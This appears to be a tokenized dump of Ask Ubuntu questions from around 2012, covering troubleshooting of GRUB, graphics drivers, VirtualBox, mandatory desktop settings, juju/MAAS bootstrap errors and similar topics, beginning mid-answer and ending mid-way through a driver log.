~/.local/share/applications/*.desktop local ( user ) applications ~/.local/share/applications/mimeapps.list contains these local associations in a single file , which is created from all the .desktop files , plus customizations from the open with dialog . in my case , i had to manually change all mentions of userapp-xnview.sh-c2f5d4.desktop to xnview.desktop . resetting the associations did n't work and the correct app never showed up . which is both a bug and completely different from the duplicate you closed this question for . log off and on again before it takes effect .
197781	upgrading lion and loosing virtual box	my virtual box is not working since i have upgraded my lion os . vt-x is being used by another hypervisor . ( verr_vmx_in_vmx_root_mode ) . virtualbox ca n't operate in vmx root mode . please close all other virtualization programs . ( verr_vmx_in_vmx_root_mode ) . so i found a forum thread here : https : //www.virtualbox.org/ticket/10965 , and the solution seems to install again the virtual box again . so now , how can i migrate all the content of my ubuntu i used to ran in the vb ?
197784	how can i distribute mandatory settings ( system and libreoffice settings ) ?	i 'm a linux sysadmin and i maintain 100 ubuntu desktops . we 're about to upgrade to 12.04 , but before we can do that we have to make ubuntu pci complaint . meaning we have to lock some mandatory settings from the users . i 've done all of the settings except the following . the last pci settings : users may not change their screen saver timeout , it has to be set to 5 minutes . and locked so that no configuration can be made by the user . users must always unlock their screen when the automatic screen saver is enabled and a keystroke or mouse movement is initiated by the user . this setting must be locked as well . i also want to push default libreoffice settings e.g . the hardware acceleration in lo is breaking the full screen presentation option in impress . so disabling that is important . on ubuntu 11.04 i could do this by adding the configuration below in /etc/gconf/gconf.xml.mandatory/ . but that does n't work anymore for the screen saver in 12.04 . i would like to know how i can make these settings mandatory in an easy way . this must also work for new machines as well , so copying profiles is not a solution . < gconf > < dir name= '' desktop '' > < dir name= '' gnome '' > < dir name= '' session '' > < entry name= '' idle_delay '' mtime= '' 1292927092 '' type= '' int '' value= '' 5 '' / > < /dir > < /dir > < /dir > < dir name= '' apps '' > < dir name= '' gnome-screensaver '' > < entry name= '' idle_activation_enabled '' mtime= '' 1300290816 '' type= '' bool '' value= '' true '' / > < entry name= '' lock_enabled '' mtime= '' 1300290814 '' type= '' bool '' value= '' true '' / > < /dir > < /dir > < dir name= '' gnome-power-manager '' > < dir name= '' lock '' > < entry name= '' use_screensaver_settings '' mtime= '' 1300291577 '' type= '' bool '' value= '' true '' / > < /dir > < /dir > < /gconf >
197790	is there a ubuntu for sparc computer ?	is there a ubuntu for sparc computer ? my friend like ubuntu and he want to install on his sparc ( ultrasparc iv , release 2005 ) .
197792	connecting to internet after clean install of ubuntu server 12.04	i 've installed ubuntu server on my computer . i would like to connect to the internet to download more software . i 've done : ifconfig eth0 up so when i print ifconfig i can see the eth0 listed , but it does n't have ip address . i tried to dhclient but that does n't print anything . what do i have to do first ?
197806	how to display correct time in persistent live usb	it seems that while booting in persistent live usb , the wrong time ( gmt / utc instead of local ) is displayed ( at least that 's what happens in lubuntu 12.10 ) .
197809	mount point /usr/share error	i had mounted a partition in /usr/share during installation of xubuntu.then i used gparted to format the partition . then whenever i boot my pc a message is displayed `` press s to skip d to manually mount the device '' . how can i solve this ?
197813	i have installed ubuntu 12.04 on a pc and i 'm sharing the desktop to a win machine but the screen is not refreshing	the image is always the same as the first image . it never updates the screen . how may i fix it ? thanks
197818	no panels , launcher , etc visible on desktop	my first time trying to use ubuntu . i clean installed the ubuntu 12.10-beta2 on an old dell dimension 4600 today . install seemed to go fine , but after restarting and entering the requested passwords i 'm taken to a purple screen with no panels , launchers or anything else -- just a purple screen . i 'm able to access the terminal from the screen with ctrl-alt-t , but i 'm not sure at this point in my linux training how to search for errors . also have no internet connection ( i 'm typing this on a mac ) , but i 'll have to deal with that later . would appreciate any suggestions .
197819	how to keep web apps running in messaging menu ?	ubuntu 12.10 introduced all sort of web apps , and some of them get added to the messaging menu . my question however is the following . these web apps must remain open in a tab , for the messaging menu to keep count of your unread messages . is there a way to keep the count going , even with the tab closed ? a behavior similar to the music apps . banshee remains open , even when you close window . but truly exit when you , specifically exit it .
197820	do i need to install anything before playing games in wine	do i need to install 3d drivers such as directx before playing games in wine ? i have played counter strike using wine , but there was errors.. what should i do ? ?
197822	what keyboard shortcut changes the `xfce4-terminal` terminal text size ?	it used to be that ctrl + - and ctrl + + would increase or decrease the text size of the terminal in earlier versions of ubuntu , which is helpful when you 're giving presentations and want to show your code in a larger size . i switched to xubuntu 12.04 , and i 'm missing these keyboard shortcuts . is there an alternative i can use ? or if not , is there a way i can define my own shortcut to replace these ?
197828	how to find and change the screen dpi ?	i am trying to find and then change the screen dpi ( dots per inch ) setting in 12.04 and 12.10 . however , i ca n't seem to find any app or config file that can do this . is there any app or conf file for this ? note that this is for 12.04+ so the following will not work : how do i change the font dpi settings ? how to change the screen dpi in 11.10 ? is it possible to change font dpi in 11.04 ? moreover , they are basically changing the font size , not the actual screen dpi .
197833	recovering from 'grub rescue > ' crash	i did a dumb thing ... i forgot that ubuntu 10.04 ( lucid lynx ) switched to grub 2 which puts a ton of *.mod files ( kernel modules ) in /boot/grub . i thought they were soundtrack files put there erroneously , and i moved them . needless to say , the next reboot was traumatic . i was presented with something i had no memory of ever seeing ... a 'grub rescue > ' prompt . with the help of [ ] ( fixing grub error : âerror : unknown filesystemâ ) however , i was able to recover ... i discovered that grub rescue does not have 'cd ' , 'cp ' or any other filesystem commands except its own variation of 'ls ' . so first i had to find the partition with the /boot directory containing vmlinuz file and other boot image files ... ( approximation from memory of failed attempts , as well as blank lines for clarity , added 2014-07-10 by docsalvage ) grub rescue > ls ( hd0,4 ) ( hd0,3 ) ( hd0,2 ) ( hd0,1 ) grub rescue > ls ( hd0,4 ) /boot ... some kind of 'not found ' message grub rescue > ls ( hd0,3 ) /boot ... some kind of 'not found ' message grub rescue > ls ( hd0,2 ) /boot ... grub ... initrd.img-2.6.32-33-generic ... vmlinuz-2.6.32-33-generic i found a /boot directory containing the vmlinuz file vmlinuz-2.6.32-33-generic on partition ( hd0,2 ) . then i manually booted from the 'grub rescue > ' prompt . the following commands will ... set the root to use the /boot directory on partition ( hd0,2 ) . load kernel module linux . set that module to use the kernel image vmlinuz-2.6.32-33-generic . set initrd ( initialize ram disk ) to use the image initrd.img-2.6.32-33-generic . boot linux . grub rescue > set root= ( hd0,2 ) /boot grub rescue > insmod linux grub rescue > linux ( hd0,2 ) /boot/vmlinuz-2.6.32-33-generic grub rescue > initrd ( hd0,2 ) /boot/initrd.img-2.6.32-33-generic grub rescue > boot this boots and crashes to the busybox prompt which does have some rudimentary filesystem commands . then i moved the *.mod files back to the /boot/grub directory ... busybox > cd /boot busybox > mv mod/* grub busybox > reboot the reboot was successful , but that was a lot of work . is there an easier way ?
197834	downgrade fglrx on ubuntu 12.10 for ati radeon hd 3650	i ca n't install old ati catalyst 12.4 drivers on ubuntu 12.10 ( with 3.2 kernel ) which support my video card ( ati radeon hd 3650 agp ) . i purged 12.9 drivers and installed old 12.4 ones , but they do n't work . http : //pastebin.com/kz6jnzut after reboot i got this : http : //pastebin.com/vzc4yrbz
197835	ca n't read dvd in xubuntu 12.04	my laptop has xubuntu 12.04 installed and i ca n't read dvds burned in my dvd recorder . to read my dvds , i had to use a external usb dvd driver ( in xubuntu ) . using dsmeg , i got this message : dmesg | grep `` sr0 '' [ 11793.286196 ] sr 2:0:0:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense [ 11793.286202 ] sr 2:0:0:0 : [ sr0 ] sense key : medium error [ current ] [ 11793.286211 ] sr 2:0:0:0 : [ sr0 ] add . sense : can not read medium - unknown format [ 11793.286221 ] sr 2:0:0:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 02 00 [ 11793.286240 ] end_request : i/o error , dev sr0 , sector 0 my laptop is an asus n43sn .
197838	compiz settings are grayed out	how do i change compiz settings in 12.04 lts ? when i try it grays out all the check boxes so i ca n't change settings !
197841	do i need to uninstall ubuntu after fresh windows 7 installation ?	i installed ubuntu 12.04 from windows 7 using wubi . for reasons i wo n't elaborate here , i had to reinstall windows 7 . now i want to uninstall ubuntu . but there is no entry for ubuntu in windows ' add/remove programs anymore . what i tried : running the uninstall executable from ubuntu 's installation folder , which did n't do anything . delete the old installation folder no matter what i do ubuntu continues to show up as a boot option together with windows 7 whenever i start my machine . how do i completely get rid of the ubuntu installation ? thanks .
197844	how to disable osd notifications for specific email addresses ?	i receive several logs per day via email , either from testing operations , server status or backup resumes . can i some how disable the notification balloon either by a specific email address , the email subject or any other possible filter , as to not be constantly notified about the success operations ? i 've looked within the notify osd configuration , but could n't find any option to this end . since the email comes with different information when errors occur , i already have filters within thunderbird as to move error logs to a folder that i keep tabs on ... if relevant , i 'm using ubuntu 12.04 fully updated , and thunderbird 15.0.1 .
197845	from terminal , how make a live usb for all distro 's , not only for ubuntu ?	with curiosity i have on terminal , i came to this step . how can i create live usb from terminal ? is there any tool i got to do that ? i am using ubuntu 12.04 .
197855	do i have to be careful if installing ubuntu on hdd with win 8 ?	i have here a new system with win 8 rtm ( release to manufacturers ) . im not really working on windows , but i have to use this pc . there is another free partition so i could install ubuntu 12.04 . i did this always with a win vista/7 system and then people can dualboot . now do i have to be careful with win 8 ? or am i doing the same stuff as i did it on a win 7 hdd ?
197857	12.04 install confusion - live cd boots fine , installed system needs acpi=off to boot	new lenovo z585 a10 laptop . i can boot the 64 bit live cd fine - try ubuntu - dmesg contains lots of acpi stuff , suspend is available etc . when i do the install i am unable to boot without acpi=off in kernel line . of course when booted i hav no suspend , no battery status etc ... seems that casper is doing a bunch of things on the live cd boot that i am not able to do with my install . help ! !
197866	acer aspire 7739g ca n't boot problem	i 've installed ubuntu 12.04 on acer aspire 7739g but i ca n't boot . after turning on i see acer logo and then black screen with peeping `` _ '' and i tried to reinstall and re-format whole hdd but it does n't work , any tip what to do ?
197868	grub does not detect windows	i have finally installed ubuntu on my second drive i change my d drive to took 8gb for swap and formated d disc ( sda4 to ext4 ) , now when i start computer in grub is shows me only ubuntu and windows 7 is not shown . so how should i fix thath problem to i will be able to choose between them at grub . another thing is after i press f12 for boot menu at startup i choose windows boot manager and i get into windows 7 . i runed command sudo fdisk -l and here is log : http : //pastebin.com/cgv1ighc warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xc3ffc3ff device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . thanks for help .
197874	samsung series 5 ultra - suspend on lid closing is disabled by kernel	i have a samsung series 5 ultra ( np530u4c - ivy bridge/nvidia version ) . the machine wo n't suspend on lid closing . i has worked on fresh install . after it i added `` pcie_aspm=force i915.i915_enable_rc6=1 i915.i915_enable_fbc=1 i915.lvds_downclock=1 '' to grub defaults . after it the suspen not worked anymore . ... neither with extra params nor without them . i think the kernel switched off the lid closing detection , because it wo n't work on windows too . how can i fix this ? my laptop bricked and the service changed the mother board so i got this problem twice .
197875	how to short this command ?	every time i need to use sublime to open a project from terminal , i have to do this : nohup sublime . & is there a way to short it ?
197876	how can i set up radius authentication properly ?	on all of our linux workstations , we have configured the pam modules to use radius authentication . this works well for all of the various things like login on the console , login using ssh , sudo , etc . but , it does n't work with the screensaver/screenlock . when we try to use it , the screen never prompts for a password . after researching the problem , it seems that the screenlock program needs to be able to read the radius authentication shared secret . but , if you make that file world readable , that defeats some of the security of radius authentication . i 've messed with setuid and setgid , both without success . so , i 'm stumped , and i just disable radius authentication . how can i set up radius authentication properly ?
197879	why ca n't i checkout with subversion 1.7 on a mounted cifs share ?	i have mounted a share on my ubuntu machine . i am unable to checkout a subversion working copy onto this share . when i try to do so , i get an error message : svn : e200033 : database is locked , executing statement 'create table repository ... however , 1 ) i am able to check out the same repository in a local directory . 2 ) my colleague on a mac is able to check the repository to the shared directory . here are my specs : ubuntu 12.04 svn 1.7.5 mount.cifs version : 5.1 //scorpio-dev/iemav_dev $ /home/selah/shares/iemav_dev cifs noauto , credentials=/etc/cifspw , uid=1000 , dir_mode=0777 , file_mode=0666 0 0
197883	grub rescue : invalid arch independent elf magic . previously i had ''no such partition '' and ''unknown filesystem ''	it all started when i formated the partition where ubuntu was installed . i wanted to get rid of it . after i restart my computer i got grub rescue : unknown filesystem . after playing a little bit and trying stuff , i got then grub rescue : no such partition . and now i installed again ubuntu and i ended up with grub rescue : invalid arch independent elf magic . i am making the thread because i have been trying to fix my computers for 2 days now and i was not able to do so . i looked through a lot of threads on here and other places.i 've done my research but i just ca n't fix it . i would appreciate help . thank you . ps : if i ca n't find any solution , i do n't mind completely format my hdd . i need my computer this wednesday i have work to do . but i do n't know how to ... lol : /
197884	screen resolution wrong - > black screen	i 've installed ubuntu 12.04 lts on my acer aspire one ( netbook ) with the help of wubi . the installation went fine , but after logging in my screen resolution was wrong . because of that the desktop and all the windows were displayed incorrectly . also , because of this i could n't change the resolution to a normal setting . i rebooted and now the display is black . i can here the boot process is going normally and after the beep i can log in correctly ( but i ca n't see a thing ) . how can i change the resolution to a normal setting ? regards , marco ps : the screen is n't broken , the netbook has a dual install and in windows vista everything is working properly .
197890	double-click instead of single-click in ubuntu 12.04	when i do a single click , my computer ( with ubuntu 12.04 ) acts like it was double click . i think it happens in ~50 % of cases . it happens with all the program i use : browsers , file manager , terminal and so on . i 'm not sure when exactly it started , maybe a week ago , and i do n't remember if it started to happen after system-update or after the installation of some packages . what i tried : change mouse change mouse settings like double-click timeout none of those helped me . any ideas ? update this bug has disappeared after upgrading to 12.10 .
197894	possibility to encrypt files to only be used on the current pc	is it possible to do the following : allow user to access anything on pc encrypt information in a way that it can only be accessed from that particular pc . if user tries to clone/dd/gpart copy the information it will not work .
197895	port an existing quickly app from 12.04 to 12.10 ?	i 've developed an app using quickly on a 12.04 system . in preparation for the 12.10 release , i 'd like to have launchpad build a version for quantal so that it can be used and tested by people from my ppa . i 'm not willing to upgrade my system yet ( i depend on it for work ) , how can i do this from 12.04 and my current quickly project ? i have a virtualbox with 12.10 installed for testing , but i do n't want to copy over the quickly project if i do n't have to . ideally , an answer should work with the quickly submitubuntu command so that it is packaged for installation in the /opt/extras.ubuntu.com directory . edit : i posted one solution below , but it makes the numbering go out of sync . if anyone has a better idea , please post an answer
197897	how to increase the amount of steps of brightness adjustment-key	the screen of my laptop ( dell vostro 3460 ) supports 16 levels of brightness : not only according to the manufacturer , but also as is clear from two oss : both windows 7 and ubuntu ( dual-booted ) support all levels . on windows 7 , the hotkeys for brightness adjustment support all levels . in ubuntu it is apparent when going on the brightness slidebar ( see picture below ) from left to right ; i can count 16 different levels of brightness when doing so . when using the hotkeys ( fn+f4 and fn+f4 ) , however , only 5 levels are supported . how can i adjust these levels and make them in line with what my screen supports ?
197903	text based installation for server	i 'm trying to install ubuntu 11.04 server on one of my machines ( 1u server ) but graphics at the time of installation has an issue . previously i would remove hdd connect it to other computer , install and put it back . however i want a method to install on 1u server directly as it is being pain to do it so many times . i read alternate cd is the only way , and alternate cd contains exactly same packages as desktop cd . now here is a problem i want server packages and text based installation . if anyone know if there are particular boot options or some way to use alternate cd for server packaged let me know . btw i 've followed http : //www.ubuntu.com/start-download ( which says everything under link is text based installer ) but i do n't think thats the case
197909	juju bootstrap error tried all solutions with no success ! now what ?	i need help with the juju bootstrap command . i 'm following this guide which references this one juju specific . i followed the guide step by step but at the juju bootstrap command this is the error i receive : 2012-08-10 01:38:48,519 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... bootstrap aborted because file storage is not writable : the supplied storage credentials were not accepted by the server 2012-08-10 01:38:49,721 error bootstrap aborted because file storage is not writable : the supplied storage credentials were not accepted by the server i tried to change the maas api key with no success . i tried to modify the cobbler media_root setting without success . is there a third option to overcome the issue ? there are other questions with the same topic but no solution and i tried the given suggestions with no success . any other advice ? anyone from canonical hanging around ? here is the enviroments.yaml environments : maas : type : maas maas-server : 'http : //10.10.10.201:80/maas' maas-oauth : 'gxebxx3dyapwvwkdgp : b2sq2hukrmg5xmb2ej : nuwbl8ewdr2jvyfnfc9f3gdrhb4dqysk' admin-secret : 'nothing' default-series : precise update following the advice to remove the $ and curly braces i now receive the following error : 2012-10-12 13:49:00,967 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... bootstrap aborted because file storage is not writable : unexpected http 500 trying to put http : //10.10.10.201:80/maas/api/1.0/files/ 2012-10-12 13:49:01,336 error bootstrap aborted because file storage is not writable : unexpected http 500 trying to put http : //10.10.10.201:80/maas/api/1.0/files/
197913	ca n't install graphic drivers in 12.04	the driver is ati/amd proprietary fglrx graphics driver . after clicking activate , it asks for my password and starts downloading . then it shows an error message : 2012-10-03 16:16:04,227 debug : updating < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > 2012-10-03 16:16:06,172 debug : reading modalias file /lib/modules/3.2.0-29-generic-pae/modules.alias 2012-10-03 16:16:06,383 debug : reading modalias file /usr/share/jockey/modaliases/b43 2012-10-03 16:16:06,386 debug : reading modalias file /usr/share/jockey/modaliases/disable-upstream-nvidia 2012-10-03 16:16:06,456 debug : loading custom handler /usr/share/jockey/handlers/pvr-omap4.py 2012-10-03 16:16:06,506 warning : modinfo for module omapdrm_pvr failed : error : modinfo : could not find module omapdrm_pvr 2012-10-03 16:16:06,509 debug : instantiated handler subclass __builtin__.pvromap4driver from name pvromap4driver 2012-10-03 16:16:06,682 debug : powervr sgx proprietary graphics driver for omap 4 not available 2012-10-03 16:16:06,682 debug : loading custom handler /usr/share/jockey/handlers/cdv.py 2012-10-03 16:16:06,727 warning : modinfo for module cedarview_gfx failed : error : modinfo : could not find module cedarview_gfx 2012-10-03 16:16:06,728 debug : instantiated handler subclass __builtin__.cdvdriver from name cdvdriver 2012-10-03 16:16:06,728 debug : cdv.available : falling back to default 2012-10-03 16:16:06,772 debug : intel cedarview graphics driver availability undetermined , adding to pool 2012-10-03 16:16:06,772 debug : loading custom handler /usr/share/jockey/handlers/vmware-client.py 2012-10-03 16:16:06,781 warning : modinfo for module vmxnet failed : error : modinfo : could not find module vmxnet 2012-10-03 16:16:06,781 debug : instantiated handler subclass __builtin__.vmwareclienthandler from name vmwareclienthandler 2012-10-03 16:16:06,795 debug : vmware client tools availability undetermined , adding to pool 2012-10-03 16:16:06,796 debug : loading custom handler /usr/share/jockey/handlers/fglrx.py 2012-10-03 16:16:06,801 warning : modinfo for module fglrx_updates failed : error : modinfo : could not find module fglrx_updates 2012-10-03 16:16:06,805 debug : instantiated handler subclass __builtin__.fglrxdriverupdate from name fglrxdriverupdate 2012-10-03 16:16:06,805 debug : fglrx.available : falling back to default 2012-10-03 16:16:06,833 debug : ati/amd proprietary fglrx graphics driver ( post-release updates ) availability undetermined , adding to pool 2012-10-03 16:16:06,836 warning : modinfo for module fglrx failed : error : modinfo : could not find module fglrx 2012-10-03 16:16:06,840 debug : instantiated handler subclass __builtin__.fglrxdriver from name fglrxdriver 2012-10-03 16:16:06,840 debug : fglrx.available : falling back to default 2012-10-03 16:16:06,873 debug : ati/amd proprietary fglrx graphics driver availability undetermined , adding to pool 2012-10-03 16:16:06,873 debug : loading custom handler /usr/share/jockey/handlers/dvb_usb_firmware.py 2012-10-03 16:16:06,925 debug : instantiated handler subclass __builtin__.dvbusbfirmwarehandler from name dvbusbfirmwarehandler 2012-10-03 16:16:06,926 debug : firmware for dvb cards not available 2012-10-03 16:16:06,926 debug : loading custom handler /usr/share/jockey/handlers/nvidia.py 2012-10-03 16:16:06,961 warning : modinfo for module nvidia_96 failed : error : modinfo : could not find module nvidia_96 2012-10-03 16:16:06,967 debug : instantiated handler subclass __builtin__.nvidiadriver96 from name nvidiadriver96 2012-10-03 16:16:06,968 debug : nvidia.available : falling back to default 2012-10-03 16:16:06,980 debug : xorgdriverhandler ( nvidia_96 , nvidia-96 , none ) : disabling as package video abi xorg-video-abi-10 does not match x.org video abi xorg-video-abi-11 2012-10-03 16:16:06,980 debug : nvidia accelerated graphics driver not available 2012-10-03 16:16:06,983 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current 2012-10-03 16:16:06,987 debug : instantiated handler subclass __builtin__.nvidiadrivercurrent from name nvidiadrivercurrent 2012-10-03 16:16:06,987 debug : nvidia.available : falling back to default 2012-10-03 16:16:07,015 debug : nvidia accelerated graphics driver availability undetermined , adding to pool 2012-10-03 16:16:07,018 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2012-10-03 16:16:07,021 debug : instantiated handler subclass __builtin__.nvidiadrivercurrentupdates from name nvidiadrivercurrentupdates 2012-10-03 16:16:07,022 debug : nvidia.available : falling back to default 2012-10-03 16:16:07,066 debug : nvidia accelerated graphics driver ( post-release updates ) availability undetermined , adding to pool 2012-10-03 16:16:07,069 warning : modinfo for module nvidia_173_updates failed : error : modinfo : could not find module nvidia_173_updates 2012-10-03 16:16:07,072 debug : instantiated handler subclass __builtin__.nvidiadriver173updates from name nvidiadriver173updates 2012-10-03 16:16:07,073 debug : nvidia.available : falling back to default 2012-10-03 16:16:07,105 debug : nvidia accelerated graphics driver ( post-release updates ) availability undetermined , adding to pool 2012-10-03 16:16:07,112 warning : modinfo for module nvidia_173 failed : error : modinfo : could not find module nvidia_173 2012-10-03 16:16:07,118 debug : instantiated handler subclass __builtin__.nvidiadriver173 from name nvidiadriver173 2012-10-03 16:16:07,119 debug : nvidia.available : falling back to default 2012-10-03 16:16:07,159 debug : nvidia accelerated graphics driver availability undetermined , adding to pool 2012-10-03 16:16:07,166 warning : modinfo for module nvidia_96_updates failed : error : modinfo : could not find module nvidia_96_updates 2012-10-03 16:16:07,171 debug : instantiated handler subclass __builtin__.nvidiadriver96updates from name nvidiadriver96updates 2012-10-03 16:16:07,171 debug : nvidia.available : falling back to default 2012-10-03 16:16:07,188 debug : xorgdriverhandler ( nvidia_96_updates , nvidia-96-updates , none ) : disabling as package video abi xorg-video-abi-10 does not match x.org video abi xorg-video-abi-11 2012-10-03 16:16:07,188 debug : nvidia accelerated graphics driver ( post-release updates ) not available 2012-10-03 16:16:07,188 debug : loading custom handler /usr/share/jockey/handlers/madwifi.py 2012-10-03 16:16:07,195 warning : modinfo for module ath_pci failed : error : modinfo : could not find module ath_pci 2012-10-03 16:16:07,195 debug : instantiated handler subclass __builtin__.madwifihandler from name madwifihandler 2012-10-03 16:16:07,196 debug : alternate atheros `` madwifi '' driver availability undetermined , adding to pool 2012-10-03 16:16:07,196 debug : loading custom handler /usr/share/jockey/handlers/sl_modem.py 2012-10-03 16:16:07,213 debug : instantiated handler subclass __builtin__.slmodem from name slmodem 2012-10-03 16:16:07,234 debug : software modem not available 2012-10-03 16:16:07,234 debug : loading custom handler /usr/share/jockey/handlers/broadcom_wl.py 2012-10-03 16:16:07,239 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-10-03 16:16:07,277 debug : instantiated handler subclass __builtin__.broadcomwlhandler from name broadcomwlhandler 2012-10-03 16:16:07,277 debug : broadcom sta wireless driver availability undetermined , adding to pool 2012-10-03 16:16:07,278 debug : all custom handlers loaded 2012-10-03 16:16:07,278 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027d8sv00001043sd000082eabc04sc03i00 ' ) 2012-10-03 16:16:07,568 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' } 2012-10-03 16:16:07,699 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,699 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' } 2012-10-03 16:16:07,699 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_hda_intel ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,699 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'input : b0000v0000p0000e0000-e0,5 , kramlsfw6 , ' ) 2012-10-03 16:16:07,704 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2012-10-03 16:16:07,704 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,704 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027dasv00001043sd00008179bc0csc05i00 ' ) 2012-10-03 16:16:07,707 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'i2c_i801 ' } 2012-10-03 16:16:07,707 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'i2c_i801 ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,707 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'acpi : pnp0c01 : ' ) 2012-10-03 16:16:07,707 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'acpi : pnp0b00 : ' ) 2012-10-03 16:16:07,707 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00001969d00001026sv00001043sd00008304bc02sc00i00 ' ) 2012-10-03 16:16:07,710 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'atl1e ' } 2012-10-03 16:16:07,710 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'atl1e ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,710 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'input : b0003v04f2p0816e0111-e0,1,4,11,14 , k71,72,73,74,75,77,79,7a,7b,7c,7d,7e,7f,80,81,82,83,84,85,86,87,88,89,8a,8c,8e,96,98,9e,9f , a1 , a3 , a4 , a5 , a6 , ad , b0 , b1 , b2 , b3 , b4 , b7 , b8 , b9 , ba , bb , bc , bd , be , bf , c0 , c1 , c2 , f0 , ram4 , l0,1,2 , sfw ' ) 2012-10-03 16:16:07,711 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2012-10-03 16:16:07,711 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,711 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2012-10-03 16:16:07,711 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,711 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'platform : pcspkr ' ) 2012-10-03 16:16:07,711 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'pcspkr ' } 2012-10-03 16:16:07,711 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'pcspkr ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,712 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_pcsp ' } 2012-10-03 16:16:07,712 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'snd_pcsp ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,712 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'usb : v1d6bp0001d0302dc09dsc00dp00ic09isc00ip00 ' ) 2012-10-03 16:16:07,724 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'input : b0019v0000p0001e0000-e0,1 , k74 , ramlsfw ' ) 2012-10-03 16:16:07,724 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' } 2012-10-03 16:16:07,724 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'evbug ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,724 debug : searching handler for driver id { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' } 2012-10-03 16:16:07,724 debug : no corresponding handler available for { 'driver_type ' : 'kernel_module ' , 'kernel_module ' : 'mac_hid ' , 'jockey_handler ' : 'kernelmodulehandler ' } 2012-10-03 16:16:07,724 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'acpi : pnp0c04 : ' ) 2012-10-03 16:16:07,724 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'platform : eisa ' ) 2012-10-03 16:16:07,725 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'pci : v00008086d000027ccsv00001043sd00008179bc0csc03i20 ' ) 2012-10-03 16:16:07,728 debug : querying driver db < jockey.detection.localkernelmodulesdriverdb instance at 0xb7231a0c > about hardwareid ( 'modalias ' , 'platform 